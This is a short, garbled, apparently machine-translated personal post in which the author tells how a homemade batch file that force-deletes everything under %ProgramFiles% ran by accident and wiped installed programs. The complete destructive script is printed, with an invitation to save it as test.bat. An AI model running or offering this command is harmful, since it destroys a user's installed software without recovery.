Accidentally deleted the t_t file under the System Disk program files.
I was studying tomcat configuration. Of course, tomcat configuration (strictly speaking, the Startup File) should be divided into two sets: Windows and UNIX. Corresponding to XXX. BAT and XXX. Sh in the % atat_home %/bin directory. So, first study the BAT file and see % ProgramFiles %. I am inspired. If I write a bat myself, go to this Dir, and then del this file, won't I...
Therefore, this test. bat was born. Set the followingCodeSave it as test. bat.
@ Echo off
Echo test. Bat created 2006-08-01
Echo Author: jaja
Cd % ProgramFiles %
Del/f/S/Q *.*
Echo delete over! Mail wangjun_cd@126.com for more help
Echo. & pause
OK. Have you saved it ?!
But the tragedy of jaja began. The brothers in the group said to post the code. Jaja was originally written in edit. If the copy fails, it enters dos and uses type to view the file content. Jaja remember to select the content to copy and press enter to copy it to the clipboard (jaja remembers it ). But the tragedy is like this-the Code executes y_y ........
It should be recoverable: it should be restored to pure dos. However, the tragedy of jaja is that the jaja keyboard is a USB interface and t_t cannot be used when it is started.
Something will be done tomorrow. ManyProgramIt can be supplemented. Office, eclipse .....
Jaja